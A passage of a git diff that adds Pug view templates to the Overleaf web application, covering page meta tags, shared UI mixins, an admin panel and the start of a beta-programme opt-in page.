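  var suffix = settings.appName + ', ' + translate('online_latex_editor')
  if (metadata && metadata.title) return metadata.title + ' - ' + suffix // CMS-provided title
  if (typeof title === 'undefined') return suffix // no page title at all
  return translate(title) + ' - ' + suffix // translated page key
}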
+ meta(name="twitter:title", content=translate(title)) + meta(name="og:title", content=translate(title)) + +//- Description +if (metadata && metadata.description) + meta(name="description" , content=metadata.description) + meta(itemprop="description" , content=metadata.description) + //-twitter and og descriptions handeled in their sections below +else + meta(name="description", content=translate("site_description")) + meta(itemprop="description", content=translate("site_description")) + +//- Image +if (metadata && metadata.image && metadata.image.fields) + //- from the CMS + meta(itemprop="image", content=metadata.image.fields.file.url) + meta(name="image", content=metadata.image.fields.file.url) +else if (metadata && metadata.image_src) + //- pages with custom metadata images, metadata.image_src is the full image URL + meta(itemprop="image", content=metadata.image_src) + meta(name="image", content=metadata.image_src) +else if (settings.overleaf) + //- the default image for Overleaf + meta(itemprop="image", content=buildImgPath('ol-brand/overleaf_og_logo.png')) + meta(name="image", content=buildImgPath('ol-brand/overleaf_og_logo.png')) +else + //- the default image for Overleaf Community Edition/Server Pro + meta(itemprop="image", content='/apple-touch-icon.png') + meta(name="image", content='/apple-touch-icon.png') + +//- Keywords +if (metadata && metadata.keywords) + meta(name="keywords" content=metadata.keywords) + +//- Misc +meta(itemprop="name", content=settings.appName + ", the Online LaTeX Editor") + +if (metadata && metadata.robotsNoindexNofollow) + meta(name="robots" content="noindex, nofollow") + +//- Twitter +meta(name="twitter:card", content=metadata && metadata.twitterCardType ? metadata.twitterCardType : 'summary') +if (settings.social && settings.social.twitter && settings.social.twitter.handle) + meta(name="twitter:site", content="@" + settings.social.twitter.handle) +if (metadata && metadata.twitterDescription) + meta(name="twitter:description", content=metadata.twitterDescription) +else + meta(name="twitter:description", content=translate("site_description")) +if (metadata && metadata.twitterImage && metadata.twitterImage.fields) + //- from the CMS + meta(name="twitter:image", content=metadata.twitterImage.fields.file.url) + meta(name="twitter:image:alt", content=metadata.twitterImage.fields.title) +else if (settings.overleaf) + //- the default image for Overleaf + meta(name="twitter:image", content=buildImgPath('ol-brand/overleaf_og_logo.png')) +else + //- the default image for Overleaf Community Edition/Server Pro + meta(name="twitter:image", content='/apple-touch-icon.png') + +//- Open Graph +//- to do - add og:url +if (settings.social && settings.social.facebook && settings.social.facebook.appId) + meta(property="fb:app_id", content=settings.social.facebook.appId) + +if (metadata && metadata.openGraphDescription) + meta(property="og:description", content=metadata.openGraphDescription) +else + meta(property="og:description", content=translate("site_description")) + +if (metadata && metadata.openGraphImage && metadata.openGraphImage.fields) + //- from the CMS + meta(property="og:image", content=metadata.openGraphImage.fields.file.url) +else if (settings.overleaf) + //- the default image for Overleaf + meta(property="og:image", content=buildImgPath('ol-brand/overleaf_og_logo.png')) +else + //- the default image for Overleaf Community Edition/Server Pro + meta(property="og:image", content='/apple-touch-icon.png') + +if (metadata && metadata.openGraphType) + 
meta(property="og:type", metadata.openGraphType) +else + meta(property="og:type", content="website") + +if (metadata && metadata.openGraphVideo) + //- from the CMS + meta(property="og:video", content=metadata.openGraphVideo) + +//- Viewport +if !metadata || metadata.viewport !== false + meta(name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=yes") + +//- Noindex +if settings.robotsNoindex + meta(name="robots" content="noindex") + +//- Icons +link(rel="icon", sizes="32x32", href="/favicon-32x32.png") +link(rel="icon", sizes="16x16", href="/favicon-16x16.png") +link(rel="icon", href="/favicon.svg" type="image/svg+xml") +link(rel="apple-touch-icon", href="/apple-touch-icon.png") +link(rel="mask-icon", href="/mask-favicon.svg", color="#046530") + +//- Canonical Tag for SEO +if (metadata && metadata.canonicalURL) + link(rel="canonical" href=metadata.canonicalURL) + +//- Manifest +//- Does not currently contain a start_url to prevent browser installation prompts +link(rel="manifest" href="/web.sitemanifest") diff --git a/services/web/app/views/_mixins/back_to_btns.pug b/services/web/app/views/_mixins/back_to_btns.pug new file mode 100644 index 0000000..da1c9c0 --- /dev/null +++ b/services/web/app/views/_mixins/back_to_btns.pug @@ -0,0 +1,4 @@ +mixin back-to-btns(settingsAnchor) + a.btn.btn-secondary.text-capitalize(href=`/user/settings${settingsAnchor ? '#' + settingsAnchor : '' }`) #{translate('back_to_account_settings')} + | + a.btn.btn-secondary.text-capitalize(href='/project') #{translate('back_to_your_projects')} \ No newline at end of file diff --git a/services/web/app/views/_mixins/begin_now_card.pug b/services/web/app/views/_mixins/begin_now_card.pug new file mode 100644 index 0000000..8f99195 --- /dev/null +++ b/services/web/app/views/_mixins/begin_now_card.pug @@ -0,0 +1,25 @@ +mixin begin_now_card() + - var registerURL = '/register' + - var plansURL = '/user/subscription/plans' + - var isUserLoggedIn = !!getSessionUser() + + .begin-now-card + div.card.card-pattern + .card-body + p.dm-mono + span.font-size-display-xs + span.text-purple-bright \begin + wbr + span.text-green-bright { + span now + span.text-green-bright } + p #{translate("discover_why_over_people_worldwide_trust_overleaf", {count: settings.userCountInMillions})} + p.card-links + if !isUserLoggedIn + a.btn.btn-primary.card-link( + href=registerURL + ) #{translate("sign_up_for_free")} + a.btn.card-link( + class = isUserLoggedIn ? 'btn-primary' : 'btn-secondary' + href=plansURL + ) #{translate("explore_all_plans")} diff --git a/services/web/app/views/_mixins/bookmarkable_tabset.pug b/services/web/app/views/_mixins/bookmarkable_tabset.pug new file mode 100644 index 0000000..27ac74e --- /dev/null +++ b/services/web/app/views/_mixins/bookmarkable_tabset.pug @@ -0,0 +1,10 @@ +mixin bookmarkable-tabset-header(id, title, active) + li(role="presentation") + a.nav-link( + href='#' + id + class=(active ? 'active' : '') + aria-controls=id + role="tab" + data-toggle="tab" + data-ol-bookmarkable-tab + ) #{title} diff --git a/services/web/app/views/_mixins/bootstrap_js.pug b/services/web/app/views/_mixins/bootstrap_js.pug new file mode 100644 index 0000000..866b0b4 --- /dev/null +++ b/services/web/app/views/_mixins/bootstrap_js.pug @@ -0,0 +1,3 @@ +mixin bootstrap-js(bootstrapVersion) + each file in (entrypointScripts(bootstrapVersion === 5 ? 
'bootstrap-5' : 'bootstrap-3')) + script(type="text/javascript", nonce=scriptNonce, src=file) diff --git a/services/web/app/views/_mixins/eyebrow.pug b/services/web/app/views/_mixins/eyebrow.pug new file mode 100644 index 0000000..c5f01a1 --- /dev/null +++ b/services/web/app/views/_mixins/eyebrow.pug @@ -0,0 +1,5 @@ +mixin eyebrow(text) + span.eyebrow-text + span(aria-hidden="true") { + span #{text} + span(aria-hidden="true") } \ No newline at end of file diff --git a/services/web/app/views/_mixins/faq_search-marketing.pug b/services/web/app/views/_mixins/faq_search-marketing.pug new file mode 100644 index 0000000..8ec136e --- /dev/null +++ b/services/web/app/views/_mixins/faq_search-marketing.pug @@ -0,0 +1,30 @@ +mixin faq_search-marketing(headerText, headerClass) + if (typeof(settings.algolia) != "undefined" && typeof(settings.algolia.indexes) != "undefined" && typeof(settings.algolia.indexes.wiki) != "undefined") + if headerText + div(class=headerClass) #{headerText} + .wiki + form.project-search.form-horizontal(role="search" data-ol-faq-search) + .form-group.has-feedback.has-feedback-left + .col-sm-12 + input.form-control(type='text', placeholder="Search help library…") + i.fa.fa-search.form-control-feedback-left(aria-hidden="true") + i.fa.fa-times.form-control-feedback( + style="cursor: pointer;", + hidden + data-ol-clear-search + aria-hidden="true" + ) + button.sr-only( + type="button" + hidden + data-ol-clear-search + aria-label=translate('clear_search') + ) + + .row(role="region" aria-label="search results") + .col-md-12() + div(data-ol-search-results-wrapper) + span.sr-only(aria-live="polite" data-ol-search-sr-help-message) + div(data-ol-search-results) + .row-spaced-small.search-result.card.card-thin(hidden data-ol-search-no-results) + p #{translate("no_search_results")} diff --git a/services/web/app/views/_mixins/foot_scripts.pug b/services/web/app/views/_mixins/foot_scripts.pug new file mode 100644 index 0000000..c6b65e8 --- /dev/null +++ b/services/web/app/views/_mixins/foot_scripts.pug @@ -0,0 +1,6 @@ +mixin foot-scripts() + each file in entrypointScripts(entrypoint) + script(type="text/javascript", nonce=scriptNonce, src=file, defer=deferScripts) + if (settings.devToolbar.enabled) + each file in entrypointScripts("devToolbar") + script(type="text/javascript", nonce=scriptNonce, src=file, defer=deferScripts) diff --git a/services/web/app/views/_mixins/formMessages.pug b/services/web/app/views/_mixins/formMessages.pug new file mode 100644 index 0000000..9ea2392 --- /dev/null +++ b/services/web/app/views/_mixins/formMessages.pug @@ -0,0 +1,91 @@ +mixin formMessages() + div( + data-ol-form-messages='', + role="alert" + ) + +mixin formMessagesNewStyle() + div( + data-ol-form-messages-new-style='', + role="alert" + ) + +mixin customFormMessage(key, kind) + if kind === 'success' + div.alert.alert-success( + hidden, + data-ol-custom-form-message=key, + role="alert" + aria-live="polite" + ) + block + else if kind === 'danger' + div.alert.alert-danger( + hidden, + data-ol-custom-form-message=key, + role="alert" + aria-live="assertive" + ) + block + else + div.alert.alert-warning( + hidden, + data-ol-custom-form-message=key, + role="alert" + aria-live="polite" + ) + block + +mixin customFormMessageNewStyle(key, kind) + if kind === 'success' + div.notification.notification-type-success( + hidden, + data-ol-custom-form-message=key, + role="alert" + aria-live="polite" + ) + div.notification-icon + span.material-symbols(aria-hidden="true") check_circle + div.notification-content.text-left 
+ block + else if kind === 'danger' + div.notification.notification-type-error( + hidden, + data-ol-custom-form-message=key, + role="alert" + aria-live="polite" + ) + div.notification-icon + span.material-symbols(aria-hidden="true") error + div.notification-content.text-left + block + else + div.notification.notification-type-warning( + hidden, + data-ol-custom-form-message=key, + role="alert" + aria-live="polite" + ) + div.notification-icon + span.material-symbols(aria-hidden="true") warning + div.notification-content.text-left + block + +mixin customValidationMessage(key) + div.invalid-feedback.mt-2( + hidden, + data-ol-custom-form-message=key + ) + i.fa.fa-fw.fa-warning.me-1(aria-hidden="true") + div + block + +mixin customValidationMessageNewStyle(key) + div.notification.notification-type-error( + hidden, + data-ol-custom-form-message=key + ) + div.notification-icon + span.material-symbols(aria-hidden="true") error + div.notification-content.text-left.small + block diff --git a/services/web/app/views/_mixins/links.pug b/services/web/app/views/_mixins/links.pug new file mode 100644 index 0000000..9036f86 --- /dev/null +++ b/services/web/app/views/_mixins/links.pug @@ -0,0 +1,123 @@ +mixin linkAdvisors(linkText, linkClass, track) + //- To Do: verify path + - var gaCategory = track && track.category ? track.category : 'All' + - var gaAction = track && track.action ? track.action : null + - var gaLabel = track && track.label ? track.label : null + - var mb = track && track.mb ? 'true' : null + - var mbSegmentation = track && track.segmentation ? track.segmentation : null + - var trigger = track && track.trigger ? track.trigger : null + a(href="/advisors" + class=linkClass ? linkClass : '' + event-tracking-ga=gaCategory + event-tracking=gaAction + event-tracking-label=gaLabel + event-tracking-trigger=trigger + event-tracking-mb=mb + event-segmentation=mbSegmentation + ) + span #{linkText ? linkText : 'advisor programme'} + +mixin linkBenefits(linkText, linkClass) + a(href=(settings.siteUrl ? settings.siteUrl : '') + "/for/authors" class=linkClass ? linkClass : '') + | #{linkText ? linkText : 'benefits'} + +mixin linkBlog(linkText, linkClass, slug) + if slug + a(href=(settings.siteUrl ? settings.siteUrl : '') + "/blog/" + slug class=linkClass ? linkClass : '') + | #{linkText ? linkText : 'blog'} + +mixin linkContact(linkText, linkClass) + a(href=(settings.siteUrl ? settings.siteUrl : '') + "/contact" class=linkClass ? linkClass : '') + | #{linkText ? linkText : 'contact'} + +mixin linkDash(linkText, linkClass) + a(href="/project" class=linkClass ? linkClass : '') + | #{linkText ? linkText : 'project dashboard'} + +mixin linkEducation(linkText, linkClass) + a(href=(settings.siteUrl ? settings.siteUrl : '') + "/for/edu" class=linkClass ? linkClass : '') + | #{linkText ? linkText : 'teaching toolkit'} + +mixin linkInvite(linkText, linkClass, track) + - var gaCategory = track && track.category ? track.category : 'All' + - var gaAction = track && track.action ? track.action : null + - var gaLabel = track && track.label ? track.label : null + - var mb = track && track.mb ? 'true' : null + - var mbSegmentation = track && track.segmentation ? track.segmentation : null + - var trigger = track && track.trigger ? track.trigger : null + + a(href="/user/bonus" + class=linkClass ? linkClass : '' + event-tracking-ga=gaCategory + event-tracking=gaAction + event-tracking-label=gaLabel + event-tracking-trigger=trigger + event-tracking-mb=mb + event-segmentation=mbSegmentation + ) + span #{linkText ? 
linkText : 'invite your friends'} + +mixin linkPlansAndPricing(linkText, linkClass) + a(href="/user/subscription/plans" class=linkClass ? linkClass : '') + | #{linkText ? linkText : 'plans and pricing'} + +mixin linkPrintNewTab(linkText, linkClass, icon, track) + - var gaCategory = track && track.category ? track.category : null + - var gaAction = track && track.action ? track.action : null + - var gaLabel = track && track.label ? track.label : null + - var mb = track && track.mb ? 'true' : null + - var mbSegmentation = track && track.segmentation ? track.segmentation : null + - var trigger = track && track.trigger ? track.trigger : null + + a(href='?media=print' + class=linkClass ? linkClass : '' + event-tracking-ga=gaCategory + event-tracking=gaAction + event-tracking-label=gaLabel + event-tracking-trigger=trigger + event-tracking-mb=mb + event-segmentation=mbSegmentation + target="_BLANK", + rel="noopener noreferrer" + ) + if icon + i(class="fa fa-print") + |   + span #{linkText ? linkText : 'print'} + +mixin linkSignIn(linkText, linkClass, redirect) + a(href=`/login${redirect ? '?redir=' + redirect : ''}` class=linkClass ? linkClass : '') + | #{linkText ? linkText : 'sign in'} + +mixin linkSignUp(linkText, linkClass, redirect) + a(href=`/register${redirect ? '?redir=' + redirect : ''}` class=linkClass ? linkClass : '') + | #{linkText ? linkText : 'sign up'} + +mixin linkTweet(linkText, linkClass, tweetText, track) + //- twitter-share-button is required by twitter + - var gaCategory = track && track.category ? track.category : 'All' + - var gaAction = track && track.action ? track.action : null + - var gaLabel = track && track.label ? track.label : null + - var mb = track && track.mb ? 'true' : null + - var mbSegmentation = track && track.segmentation ? track.segmentation : null + - var trigger = track && track.trigger ? track.trigger : null + a(class="twitter-share-button " + linkClass + event-tracking-ga=gaCategory + event-tracking=gaAction + event-tracking-label=gaLabel + event-tracking-trigger=trigger + event-tracking-mb=mb + event-segmentation=mbSegmentation + href="https://twitter.com/intent/tweet?text=" + tweetText + target="_BLANK", + rel="noopener noreferrer" + ) #{linkText ? linkText : 'tweet'} + +mixin linkUniversities(linkText, linkClass) + a(href=(settings.siteUrl ? settings.siteUrl : '') + "/for/universities" class=linkClass ? linkClass : '') + | #{linkText ? 
linkText : 'universities'}
+
+mixin linkWithArrow({text, href, eventTracking, eventSegmentation, eventTrackingTrigger})
+ a.link-with-arrow(href=href event-tracking=eventTracking event-segmentation=eventSegmentation, event-tracking-trigger=eventTrackingTrigger event-tracking-mb)
+ | #{text}
+ i.material-symbols(aria-hidden="true") arrow_right_alt
diff --git a/services/web/app/views/_mixins/navbar.pug b/services/web/app/views/_mixins/navbar.pug
new file mode 100644
index 0000000..f3482d3
--- /dev/null
+++ b/services/web/app/views/_mixins/navbar.pug
@@ -0,0 +1,23 @@
+mixin nav-item
+ li(role="none")&attributes(attributes)
+ block
+
+mixin nav-link
+ a(role="menuitem").nav-link&attributes(attributes)
+ block
+
+mixin dropdown-menu
+ ul(role="menu").dropdown-menu&attributes(attributes)
+ block
+
+mixin dropdown-menu-item
+ li(role="none")
+ block
+
+mixin dropdown-menu-link-item
+ +dropdown-menu-item
+ a(role="menuitem").dropdown-item&attributes(attributes)
+ block
+
+mixin dropdown-menu-divider
+ li(role="separator").dropdown-divider.d-none.d-lg-block
diff --git a/services/web/app/views/_mixins/notification.pug b/services/web/app/views/_mixins/notification.pug
new file mode 100644
index 0000000..3e336af
--- /dev/null
+++ b/services/web/app/views/_mixins/notification.pug
@@ -0,0 +1,42 @@
+//- to be kept in sync with frontend/js/shared/components/notification.tsx
+
+mixin notificationIcon(type)
+ if type === 'info'
+ span.material-symbols(aria-hidden="true") info
+ else if type === 'success'
+ span.material-symbols(aria-hidden="true") check_circle
+ else if type === 'error'
+ span.material-symbols(aria-hidden="true") error
+ else if type === 'warning'
+ span.material-symbols(aria-hidden="true") warning
+
+
+mixin notification(options)
+ - var {ariaLive, id, type, title, content, disclaimer, className, isActionBelowContent} = options
+ - var classNames = `notification notification-type-${type} ${className ? className : ''} ${isActionBelowContent ?
'notification-cta-below-content' : ''}` + + div( + aria-live=ariaLive, + role="alert", + id=id, + class=classNames + ) + .notification-icon + +notificationIcon(type) + .notification-content-and-cta + .notification-content + if title + p + b #{title} + | !{content} + //- TODO: handle action + //- if action + //- .notification-cta + if disclaimer + .notification-disclaimer #{disclaimer} + //- TODO: handle dismissible notifications + //- TODO: handle onDismiss + //- if isDismissible + //- .notification-close-btn + //- button(aria-label=translate('close')) + //- span.material-symbols(aria-hidden="true") close diff --git a/services/web/app/views/_mixins/pagination.pug b/services/web/app/views/_mixins/pagination.pug new file mode 100644 index 0000000..ef5f62b --- /dev/null +++ b/services/web/app/views/_mixins/pagination.pug @@ -0,0 +1,86 @@ +mixin pagination(pages, page_path, max_btns) + //- @param pages.current_page the current page viewed + //- @param pages.total_pages previously calculated, + //- based on total entries and entries per page + //- @param page_path the relative path, minus a trailing slash and page param + //- @param max_btns max number of buttons on either side of the current page + //- button and excludes first, prev, next, last + + if pages && pages.current_page && pages.total_pages && pages.total_pages > 1 + - var max_btns = max_btns || 4 + - var prev_page = Math.max(parseInt(pages.current_page, 10) - max_btns, 1) + - var next_page = parseInt(pages.current_page, 10) + 1 + - var next_index = 0; + - var full_page_path = page_path + "/page/" + + nav(role="navigation" aria-label=(translate("pagination_navigation"))) + ul.pagination + if pages.current_page > 1 + li + a( + aria-label=translate("go_to_first_page") + href=page_path + ) + span(aria-hidden="true") << + | + | First + li + a( + aria-label=translate("go_to_previous_page") + href=full_page_path + (parseInt(pages.current_page, 10) - 1) + rel="prev" + ) + span(aria-hidden="true") < + | + | Prev + + if pages.current_page - max_btns > 1 + li(aria-hidden="true") + span … + + while prev_page < pages.current_page + li + a( + aria-label=translate("go_to_page_x", {page: prev_page}) + href=full_page_path + prev_page + ) #{prev_page} + - prev_page++ + + li(class="active") + span( + aria-label=translate("current_page_page", {page: pages.current_page}) + aria-current="true" + ) #{pages.current_page} + + if pages.current_page < pages.total_pages + while next_page <= pages.total_pages && next_index < max_btns + li + a( + aria-label=translate("go_to_page_x", {page: next_page}) + href=full_page_path + next_page + ) #{next_page} + - next_page++ + - next_index++ + + if next_page <= pages.total_pages + li.ellipses(aria-hidden="true") + span … + + li + a( + aria-label=translate("go_to_next_page") + href=full_page_path + (parseInt(pages.current_page, 10) + 1) + rel="next" + ) + | Next + | + span(aria-hidden="true") > + + li + a( + aria-label=translate("go_to_last_page") + href=full_page_path + pages.total_pages + ) + | Last + | + span(aria-hidden="true") >> diff --git a/services/web/app/views/_mixins/previous_page_link.pug b/services/web/app/views/_mixins/previous_page_link.pug new file mode 100644 index 0000000..5218c6a --- /dev/null +++ b/services/web/app/views/_mixins/previous_page_link.pug @@ -0,0 +1,4 @@ +mixin previous-page-link(href, text) + a.previous-page-link(href=href) + i.material-symbols.material-symbols-rounded(aria-hidden="true") arrow_left_alt + | #{text} diff --git a/services/web/app/views/_mixins/quote.pug 
b/services/web/app/views/_mixins/quote.pug new file mode 100644 index 0000000..b8065db --- /dev/null +++ b/services/web/app/views/_mixins/quote.pug @@ -0,0 +1,54 @@ +mixin quoteLargeTextCentered(quote, person, position, affiliation, link, pictureUrl, pictureAltAttr) + blockquote.quote-large-text-centered + .quote !{quote} + if pictureUrl + .quote-img + img(src=pictureUrl alt=pictureAltAttr) + footer + div.quote-person + strong #{person} + if person && position + div #{position} + if affiliation + div #{affiliation} + if link + .quote-link !{link} + +mixin quoteLeftGreenBorder({quote, person, position, affiliation, link}) + blockquote.quote-left-green-border + .quote !{quote} + footer + | #{person} + | #{position || affiliation ? ',' : ''} + | #{position} + | #{position && affiliation ? ' at ' : ''} + | #{affiliation} + if link + .quote-link !{link} + +mixin collinsQuote1 + .card.card-dark-green-bg + -var quote = 'Overleaf is indispensable for us. We use it in our research, thesis writing, project proposals, and manuscripts for publication. When it comes to writing, it’s our main tool.' + -var quotePerson = 'Christopher Collins' + -var quotePersonPosition = 'Associate Professor and Lab Director, Ontario Tech University' + -var quotePersonImg = buildImgPath("advocates/collins.jpg") + .card-body + +quoteLargeTextCentered(quote, quotePerson, quotePersonPosition, null, null, quotePersonImg, quotePerson) + +mixin collinsQuote2 + .card.card-dark-green-bg + -var quote = 'We are writing collaboratively right up until the last minute. We are faced with deadlines all the time, and Overleaf gives us the ability to polish right up until the last possible second.' + -var quotePerson = 'Christopher Collins' + -var quotePersonPosition = 'Associate Professor and Lab Director, Ontario Tech University' + -var quotePersonImg = buildImgPath("advocates/collins.jpg") + .card-body + +quoteLargeTextCentered(quote, quotePerson, quotePersonPosition, null, null, quotePersonImg, quotePerson) + +mixin bennettQuote1 + .card.card-dark-green-bg + -var quote = 'With Overleaf, we now have a process for developing technical documentation which has virtually eliminated the time required to properly format and layout documents.' 
+ -var quotePerson = 'Andrew Bennett' + -var quotePersonPosition = 'Software Architect, Symplectic' + -var quotePersonImg = buildImgPath("advocates/bennett.jpg") + .card-body + +quoteLargeTextCentered(quote, quotePerson, quotePersonPosition, null, null, quotePersonImg, quotePerson) \ No newline at end of file diff --git a/services/web/app/views/_mixins/recaptcha.pug b/services/web/app/views/_mixins/recaptcha.pug new file mode 100644 index 0000000..24e0c50 --- /dev/null +++ b/services/web/app/views/_mixins/recaptcha.pug @@ -0,0 +1,2 @@ +mixin recaptchaConditions() + .recaptcha-branding !{translate("recaptcha_conditions", {}, [{}, {name: 'a', attrs: {href: 'https://policies.google.com/privacy', rel: 'noopener noreferrer', target: '_blank'}}, {name: 'a', attrs: {href: 'https://policies.google.com/terms', rel: 'noopener noreferrer', target: '_blank'}}])} diff --git a/services/web/app/views/_mixins/reconfirm_affiliation-marketing.pug b/services/web/app/views/_mixins/reconfirm_affiliation-marketing.pug new file mode 100644 index 0000000..c42a3b4 --- /dev/null +++ b/services/web/app/views/_mixins/reconfirm_affiliation-marketing.pug @@ -0,0 +1,61 @@ +mixin reconfirmAffiliationNotification-marketing(userEmail, location) + form( + data-ol-async-form + action='/user/emails/send-reconfirmation' + ) + input(name="_csrf" type="hidden" value=csrfToken) + input(name="email" type="hidden" value=userEmail.email) + +formMessages() + + .reconfirm-notification + div(data-ol-not-sent style="width:100%;") + i.fa.fa-warning + + - var ssoEnabled = userEmail.affiliation && userEmail.affiliation.institution && userEmail.affiliation.institution.ssoEnabled + if ssoEnabled + - var institutionId = userEmail.affiliation && userEmail.affiliation.institution && userEmail.affiliation.institution.id + a.btn-reconfirm.btn.btn-sm.btn-info( + data-ol-slow-link + href=`${settings.saml.ukamf.initPath}?university_id=${institutionId}&reconfirm=${location}` + ) + span(data-ol-inflight="idle") #{translate("confirm_affiliation")} + span(hidden data-ol-inflight="pending") #{translate("pending")}… + + else + button.btn-reconfirm.btn.btn-sm.btn-info( + type="submit" + data-ol-disabled-inflight + ) + span(data-ol-inflight="idle") #{translate("confirm_affiliation")} + span(hidden data-ol-inflight="pending") #{translate("pending")}… + + | !{translate("are_you_still_at", {institutionName: userEmail.affiliation.institution.name}, ['strong'])}  + + if location == '/user/settings' + | !{translate('please_reconfirm_institutional_email', {}, [{ name: 'span' }])} + if userEmail.default + span  #{translate('need_to_add_new_primary_before_remove')} + else + | !{translate("please_reconfirm_institutional_email", {}, [{name: 'a', attrs: {href: '/user/settings?remove=' + userEmail.email}}])} + + |   + a(href="/learn/how-to/Institutional_Email_Reconfirmation" target="_blank") #{translate("learn_more")} + + div(hidden data-ol-sent) + | !{translate("please_check_your_inbox_to_confirm", {institutionName: userEmail.affiliation.institution.name}, ['strong'])} + |   + button.btn-inline-link( + type="submit" + data-ol-disabled-inflight + ) + span(data-ol-inflight="idle") #{translate('resend_confirmation_email')} + span(hidden data-ol-inflight="pending") #{translate("pending")}… + +mixin reconfirmedAffiliationNotification-marketing(userEmail) + .alert.alert-info + .reconfirm-notification + div(style="width:100%;") + //- extra div for flex styling + | !{translate("your_affiliation_is_confirmed", {institutionName: userEmail.affiliation.institution.name}, 
['strong'])} + | + | #{translate('thank_you_exclamation')} diff --git a/services/web/app/views/_mixins/terms_of_service.pug b/services/web/app/views/_mixins/terms_of_service.pug new file mode 100644 index 0000000..0fc3887 --- /dev/null +++ b/services/web/app/views/_mixins/terms_of_service.pug @@ -0,0 +1,3 @@ +mixin termsOfServiceAgreement + div.tos-agreement-notice + | !{translate("by_registering_you_agree_to_our_terms_of_service", {}, [{name: 'a', attrs: {href: '/legal#Terms', target: '_blank'}}, {name: 'a', attrs: {href: '/legal#Privacy', target: '_blank'}}])} diff --git a/services/web/app/views/admin/index.pug b/services/web/app/views/admin/index.pug new file mode 100644 index 0000000..aaf2228 --- /dev/null +++ b/services/web/app/views/admin/index.pug @@ -0,0 +1,102 @@ +extends ../layout-marketing +include ../_mixins/bookmarkable_tabset + +block content + .content.content-alt#main-content + .container + .row + .col-sm-12 + .card + .card-body + .page-header + h1 Admin Panel + .ol-tabs(data-ol-bookmarkable-tabset) + .nav-tabs-container + ul.nav.nav-tabs.align-left(role="tablist") + +bookmarkable-tabset-header('system-messages', 'System Messages', true) + +bookmarkable-tabset-header('open-sockets', 'Open Sockets') + +bookmarkable-tabset-header('open-close-editor', 'Open/Close Editor') + if hasFeature('saas') + +bookmarkable-tabset-header('tpds', 'TPDS/Dropbox Management') + + .tab-content + .tab-pane.active( + role="tabpanel" + id='system-messages' + ) + each message in systemMessages + ul.system-messages + li.system-message.row-spaced #{message.content} + hr + form(method='post', action='/admin/messages') + input(name="_csrf", type="hidden", value=csrfToken) + .form-group + label.form-label(for="content") + input.form-control(name="content", type="text", placeholder="Message…", required) + button.btn.btn-primary(type="submit") Post Message + hr + form(method='post', action='/admin/messages/clear') + input(name="_csrf", type="hidden", value=csrfToken) + button.btn.btn-danger(type="submit") Clear all messages + + .tab-pane( + role="tabpanel" + id='open-sockets' + ) + .row-spaced + ul + each agents, url in openSockets + li #{url} - total : #{agents.length} + ul + each agent in agents + li #{agent} + + .tab-pane( + role="tabpanel" + id='open-close-editor' + ) + if hasFeature('saas') + | The "Open/Close Editor" feature is not available in SAAS. + else + .row-spaced + form(method='post',action='/admin/closeEditor') + input(name="_csrf", type="hidden", value=csrfToken) + button.btn.btn-danger(type="submit") Close Editor + p.small Will stop anyone opening the editor. Will NOT disconnect already connected users. + + .row-spaced + form(method='post',action='/admin/disconnectAllUsers') + input(name="_csrf", type="hidden", value=csrfToken) + button.btn.btn-danger(type="submit") Disconnect all users + p.small Will force disconnect all users with the editor open. Make sure to close the editor first to avoid them reconnecting. + + .row-spaced + form(method='post',action='/admin/openEditor') + input(name="_csrf", type="hidden", value=csrfToken) + button.btn.btn-danger(type="submit") Reopen Editor + p.small Will reopen the editor after closing. 
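Each admin action above is a plain HTML form POST whose only required field is the hidden _csrf input. For reference, a rough script equivalent of the "Close Editor" form, assuming the ol-csrfToken meta tag that the base layout in this commit renders on every page (the closeEditor helper name is hypothetical):

// Hypothetical helper: POST the same request the "Close Editor" form sends.
// Reads the CSRF token from the ol-csrfToken meta tag (see layout-base.pug).
async function closeEditor() {
  var token = document.querySelector('meta[name="ol-csrfToken"]').content
  var response = await fetch('/admin/closeEditor', {
    method: 'POST',
    headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
    body: new URLSearchParams({ _csrf: token }),
  })
  if (!response.ok) throw new Error('close editor failed: ' + response.status)
}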
+ + if hasFeature('saas') + .tab-pane( + role="tabpanel" + id='tpds' + ) + h3 Flush project to TPDS + .row + form.col-xs-6(method='post',action='/admin/flushProjectToTpds') + input(name="_csrf", type="hidden", value=csrfToken) + .form-group + label.form-label(for='project_id') project_id + input.form-control(type='text', name='project_id', placeholder='project_id', required) + .form-group + button.btn-primary.btn(type='submit') Flush + hr + h3 Poll Dropbox for user + .row + form.col-xs-6(method='post',action='/admin/pollDropboxForUser') + input(name="_csrf", type="hidden", value=csrfToken) + .form-group + label.form-label(for='user_id') user_id + input.form-control(type='text', name='user_id', placeholder='user_id', required) + .form-group + button.btn-primary.btn(type='submit') Poll diff --git a/services/web/app/views/beta_program/opt_in.pug b/services/web/app/views/beta_program/opt_in.pug new file mode 100644 index 0000000..2bbc26c --- /dev/null +++ b/services/web/app/views/beta_program/opt_in.pug @@ -0,0 +1,75 @@ +extends ../layout-marketing +include ../_mixins/back_to_btns + +block vars + - bootstrap5PageStatus = 'disabled' + +block content + main.content.content-alt#main-content + .container.beta-opt-in-wrapper + .row + .col-md-10.col-md-offset-1.col-lg-8.col-lg-offset-2 + .card + .page-header + h1 + | #{translate("sharelatex_beta_program")} + .beta-opt-in + .container-fluid + .row + .col-md-12 + if user.betaProgram + p.text-centered + strong #{translate("beta_program_already_participating")}. + p !{translate("thank_you_for_being_part_of_our_beta_program", {}, ['strong'])}. + else + p.text-centered + strong #{translate("beta_program_not_participating")}. + p !{translate("beta_program_benefits", {}, ['strong'])} + + p #[strong How it works:] + ul + li #{translate("beta_program_badge_description")} #[span(aria-label=translate("beta_feature_badge") role="img").beta-badge] + li !{translate("you_will_be_able_to_contact_us_any_time_to_share_your_feedback", {}, ['strong'])}. + li !{translate("we_may_also_contact_you_from_time_to_time_by_email_with_a_survey", {}, ['strong'])}. + li !{translate("you_can_opt_in_and_out_of_the_program_at_any_time_on_this_page", {}, ['strong'])}. + p !{translate("note_features_under_development", {}, ['strong'])}. 
